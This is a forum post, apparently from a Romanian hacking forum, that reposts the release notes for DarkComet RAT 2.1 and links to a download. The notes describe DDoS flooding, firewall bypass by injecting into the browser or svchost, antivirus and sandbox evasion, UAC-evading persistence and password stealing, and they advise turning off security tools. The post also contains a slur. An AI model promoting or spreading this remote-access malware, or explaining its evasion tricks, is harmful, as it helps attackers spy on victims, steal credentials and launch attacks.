Paul4games

DarkComet RAT 2.1 FWB

Urmatorul text este scris de autorul acestui rat:

"Hey guy's

here is the latest version of DarkComet Remote Administration Tool

this is version is weight more stable than the previous , i called it 2.1 because its looks like 2.0 Ultimate with a large amount of bugs fixed (more than 30 minor bugs fixed and 3 Major bugs fixed)

So whats new ?

I don't make a list for this version because there is not so much new innovation ! i hope i can remember all i did:

- UDP Flood added

- Syn(TCP) Flood added

(same speed and power as HTTP flood)

- Now in file manager you can directly rename files on listview like the microsoft explorer :) its more user friendly and pro

- same for rename window on the list

- you can type global notes in the main forms

- you can take specific notes for each servers then for each session it will remember them

- Now file manager shortcut desktop and my documents (personnal)

- Many bug fixed

- Socket handling is weight more fast !

- File transfer or double buffered for a clean view

- FWB added full process , for 32 bit in default browser , for 64 bit in svchost !

(bypass Bitdefender firewall , COMODO firewall , Avira web guard , i didn't test ZoneAlart but it should)

ps : if you see an error in server startup then just don't use FWB (it really rarely happened but i think its cause of my AV that freeze the injection some time and cause this but as i said it is really really really rare)

also i always recommended to use the less function of this kind but i put it for FWB fans !

- Some startup removed that wasn't working well for people that don't know how to use them or simply unstable

- New kind of IA added in the RAT if the UAC catch the dropped server server will detect the anomaly and move it in a sure place on %TEMP% and create a undelete folder in this path that mean CCleaner will not delete this path on clean for example.

I'm proud to say that the 3 major bugs was fixed !

1 - Now DarkComet can run in all kind of OS , it is Chinese Compatible !!!!

2 - Now DarkComet can run under VMWare in NAT

3 - No more connection bugs in some kind of OS

this two fixed bugs make this RAT totally stable under connection.

What i will improved in future release.

1 - As i see screen capture and remote desktop speed doesn't depend of the network but of the machine CPU and RAM more CPU and RAM the remote computer have and more the capture will be fast , actually it need many resources i will implement a new method of picture conversion using less memory like teamviewer and detect null pixels change.

2 - Webcam will not display anymore select source like most of the RAT (working on this)

3 - Add some new possibility , functions , stability (always)

4 - Add more password retriever in native with mass password retriever

-------

Coming soon a MUI version (Multi User Interface - Multi Language)

Coming soon some plugins

Coming soon a full detail manual !

Feel free to contact me via email or PM if you encountered any kind of bugs or problems during your test/uses !

No propose of buying the sources or a private please i don't sell anything !

Few recommendation to be sure it will works properly :

On Client side only :

- Be sure your port are correctly port forwarded by checking this website : Online Port Scan | Port Scanning | Port Scanner | Portscan Tool

- If no connections appear on your Client then thats mean a firewall block it (as i know for me , COMODO block arrival server connections and maby other firewalls then test without any firewalls )

- Disable Avira web guard

- Never manually port forward and use UPNP with the RAT it will make paquet collision and not work properly.

- Don't do the fagget by checking all functions in edit server without understanding what they mean !

- if you want to test in yourself run it sandboxed (if of course you don't check anti sandboxes)

- The rest should be fine !

I GUESS !!!"

Downlaod link:

http://darkcomet-rat.com/url.php?id=1

P.s.:Aceasta versiune este foarte stabila(am testato o saptamana si ceva si toate bugurile gasite au fost fixate),oricum daca gasiti vreun bug nu ezitati sa il postat aici!

Edited by Paul4games